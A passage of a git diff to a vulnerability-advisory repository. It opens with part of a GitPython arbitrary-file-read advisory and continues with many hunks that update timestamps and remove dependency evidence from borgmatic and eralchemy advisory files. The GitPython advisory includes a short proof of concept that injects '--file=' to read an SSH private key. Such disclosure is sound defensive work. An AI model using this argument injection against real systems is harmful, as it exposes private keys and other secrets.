TagReference\nt = TagReference.create(repo, \"vpwn\", reference=\"--file=/home/app/.ssh/id_rsa\")\nprint(t.tag.message) # contents of the file\n```\n\n## Attack Chain\n1. Entry: app calls `TagReference.create(repo, name, reference=)` with `reference=\"--file=/home/app/.ssh/id_rsa\"`.\n2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), [\"--file\",\"-F\"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file=\"…\"` IS blocked; only the positional escapes).\n3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=']`.\n4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).\n\n## Affected Versions\n`GitPython <= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).\n\n## Suggested Fix\nInclude the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-3wxw-xv34-2frg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78679" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2208" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/1b0d2d9b91575f7db44ef4ff58ac37fc9335e5f6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-tagreference-create" + } + ] +} diff --git a/advisories/BREW-borgmatic-CVE-2014-1829.json b/advisories/BREW-borgmatic-CVE-2014-1829.json index 69e345b513d..343062beaa3 100644 --- a/advisories/BREW-borgmatic-CVE-2014-1829.json +++ b/advisories/BREW-borgmatic-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2014-1829", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2014-1830.json b/advisories/BREW-borgmatic-CVE-2014-1830.json index ed0ba143012..c46037f0c71 100644 --- a/advisories/BREW-borgmatic-CVE-2014-1830.json +++ b/advisories/BREW-borgmatic-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2014-1830", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2015-2296.json b/advisories/BREW-borgmatic-CVE-2015-2296.json index 8388ab1a05f..2a114e30f69 100644 --- a/advisories/BREW-borgmatic-CVE-2015-2296.json +++ b/advisories/BREW-borgmatic-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2015-2296", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2016-9015.json b/advisories/BREW-borgmatic-CVE-2016-9015.json index 123a0a8a0d8..410ca5998d5 100644 --- a/advisories/BREW-borgmatic-CVE-2016-9015.json +++ b/advisories/BREW-borgmatic-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2016-9015", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2018-18074.json b/advisories/BREW-borgmatic-CVE-2018-18074.json index f85aa83b757..616351f5aa4 100644 --- a/advisories/BREW-borgmatic-CVE-2018-18074.json +++ b/advisories/BREW-borgmatic-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2018-18074", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2018-20060.json b/advisories/BREW-borgmatic-CVE-2018-20060.json index 427a47466c8..2ebce62b655 100644 --- a/advisories/BREW-borgmatic-CVE-2018-20060.json +++ b/advisories/BREW-borgmatic-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2018-20060", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2018-25091.json b/advisories/BREW-borgmatic-CVE-2018-25091.json index 3524d6c832c..6ed43ffe2fe 100644 --- a/advisories/BREW-borgmatic-CVE-2018-25091.json +++ b/advisories/BREW-borgmatic-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2018-25091", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2019-11236.json b/advisories/BREW-borgmatic-CVE-2019-11236.json index a318f8cbbc0..49330002bd8 100644 --- a/advisories/BREW-borgmatic-CVE-2019-11236.json +++ b/advisories/BREW-borgmatic-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2019-11236", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2019-11324.json b/advisories/BREW-borgmatic-CVE-2019-11324.json index fee7dcae41f..87f63cf5d91 100644 --- a/advisories/BREW-borgmatic-CVE-2019-11324.json +++ b/advisories/BREW-borgmatic-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2019-11324", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2020-26137.json b/advisories/BREW-borgmatic-CVE-2020-26137.json index f8ee19b984f..798d4b0d459 100644 --- a/advisories/BREW-borgmatic-CVE-2020-26137.json +++ b/advisories/BREW-borgmatic-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2020-26137", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2020-7212.json b/advisories/BREW-borgmatic-CVE-2020-7212.json index 217c047fe51..30ff820b9f9 100644 --- a/advisories/BREW-borgmatic-CVE-2020-7212.json +++ b/advisories/BREW-borgmatic-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2020-7212", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2021-28363.json b/advisories/BREW-borgmatic-CVE-2021-28363.json index 0c7918984f7..81d4362f84f 100644 --- a/advisories/BREW-borgmatic-CVE-2021-28363.json +++ b/advisories/BREW-borgmatic-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2021-28363", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2021-33503.json b/advisories/BREW-borgmatic-CVE-2021-33503.json index 6a1fad98c2a..90cb81dc05a 100644 --- a/advisories/BREW-borgmatic-CVE-2021-33503.json +++ b/advisories/BREW-borgmatic-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2021-33503", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2023-32681.json b/advisories/BREW-borgmatic-CVE-2023-32681.json index 32ff18bb6e2..59a9b82c0e0 100644 --- a/advisories/BREW-borgmatic-CVE-2023-32681.json +++ b/advisories/BREW-borgmatic-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2023-32681", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2023-43804.json b/advisories/BREW-borgmatic-CVE-2023-43804.json index e744840738e..53c6d8c9029 100644 --- a/advisories/BREW-borgmatic-CVE-2023-43804.json +++ b/advisories/BREW-borgmatic-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2023-43804", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2023-45803.json b/advisories/BREW-borgmatic-CVE-2023-45803.json index e687a1f312b..4a1d204cd15 100644 --- a/advisories/BREW-borgmatic-CVE-2023-45803.json +++ b/advisories/BREW-borgmatic-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2023-45803", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2024-35195.json b/advisories/BREW-borgmatic-CVE-2024-35195.json index 20902f264b5..84055899c66 100644 --- a/advisories/BREW-borgmatic-CVE-2024-35195.json +++ b/advisories/BREW-borgmatic-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2024-35195", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2024-3651.json b/advisories/BREW-borgmatic-CVE-2024-3651.json index f04ffc60b61..2a8f92a0230 100644 --- a/advisories/BREW-borgmatic-CVE-2024-3651.json +++ b/advisories/BREW-borgmatic-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2024-3651", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-17T16:57:07Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2024-37891.json b/advisories/BREW-borgmatic-CVE-2024-37891.json index 99750cc715b..6aab1f00246 100644 --- a/advisories/BREW-borgmatic-CVE-2024-37891.json +++ b/advisories/BREW-borgmatic-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2024-37891", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2024-47081.json b/advisories/BREW-borgmatic-CVE-2024-47081.json index 384f55eef48..3ba395117f3 100644 --- a/advisories/BREW-borgmatic-CVE-2024-47081.json +++ b/advisories/BREW-borgmatic-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2024-47081", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2025-50181.json b/advisories/BREW-borgmatic-CVE-2025-50181.json index cc7df669da9..835c4bdbd33 100644 --- a/advisories/BREW-borgmatic-CVE-2025-50181.json +++ b/advisories/BREW-borgmatic-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2025-50181", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2025-50182.json b/advisories/BREW-borgmatic-CVE-2025-50182.json index 5ce7a466ae7..e7603897e20 100644 --- a/advisories/BREW-borgmatic-CVE-2025-50182.json +++ b/advisories/BREW-borgmatic-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2025-50182", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2025-66418.json b/advisories/BREW-borgmatic-CVE-2025-66418.json index 8ba03f87319..2abefbc9335 100644 --- a/advisories/BREW-borgmatic-CVE-2025-66418.json +++ b/advisories/BREW-borgmatic-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2025-66418", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2025-66471.json b/advisories/BREW-borgmatic-CVE-2025-66471.json index d0ec065062a..99b38e041d1 100644 --- a/advisories/BREW-borgmatic-CVE-2025-66471.json +++ b/advisories/BREW-borgmatic-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2025-66471", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2026-21441.json b/advisories/BREW-borgmatic-CVE-2026-21441.json index eda7434d685..1ec8f8cc966 100644 --- a/advisories/BREW-borgmatic-CVE-2026-21441.json +++ b/advisories/BREW-borgmatic-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2026-21441", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2026-25645.json b/advisories/BREW-borgmatic-CVE-2026-25645.json index e8744c654cf..fc3d25cadc5 100644 --- a/advisories/BREW-borgmatic-CVE-2026-25645.json +++ b/advisories/BREW-borgmatic-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2026-25645", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2026-44431.json b/advisories/BREW-borgmatic-CVE-2026-44431.json index ff70a0aebf5..c8d2322071e 100644 --- a/advisories/BREW-borgmatic-CVE-2026-44431.json +++ b/advisories/BREW-borgmatic-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2026-44431", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2026-44432.json b/advisories/BREW-borgmatic-CVE-2026-44432.json index 05be84aa6bd..e802d9d0e90 100644 --- a/advisories/BREW-borgmatic-CVE-2026-44432.json +++ b/advisories/BREW-borgmatic-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2026-44432", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-13T16:38:22Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-borgmatic-CVE-2026-45409.json b/advisories/BREW-borgmatic-CVE-2026-45409.json index bff9af38606..23b5cb9af21 100644 --- a/advisories/BREW-borgmatic-CVE-2026-45409.json +++ b/advisories/BREW-borgmatic-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-borgmatic-CVE-2026-45409", "published": "2026-08-13T16:38:22Z", - "modified": "2026-08-17T16:57:07Z", + "modified": "2026-09-10T18:57:15Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-eralchemy-CVE-2012-0805.json b/advisories/BREW-eralchemy-CVE-2012-0805.json index 2aa6371dd13..2ad4a521871 100644 --- a/advisories/BREW-eralchemy-CVE-2012-0805.json +++ b/advisories/BREW-eralchemy-CVE-2012-0805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-eralchemy-CVE-2012-0805", "published": "2026-08-13T16:45:06Z", - "modified": "2026-08-13T16:45:06Z", + "modified": "2026-09-10T19:07:43Z", "upstream": [ "GHSA-hfg2-wf6j-x53p", "CVE-2012-0805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.49", - "key": "pkg:pypi/sqlalchemy@2.0.49", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-eralchemy-CVE-2019-7164.json b/advisories/BREW-eralchemy-CVE-2019-7164.json index ec0b08c5266..1cf0db66f3d 100644 --- a/advisories/BREW-eralchemy-CVE-2019-7164.json +++ b/advisories/BREW-eralchemy-CVE-2019-7164.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-eralchemy-CVE-2019-7164", "published": "2026-08-13T16:45:06Z", - "modified": "2026-08-13T16:45:06Z", + "modified": "2026-09-10T19:07:43Z", "upstream": [ "GHSA-887w-45rq-vxgf", "CVE-2019-7164", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.49", - "key": "pkg:pypi/sqlalchemy@2.0.49", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git 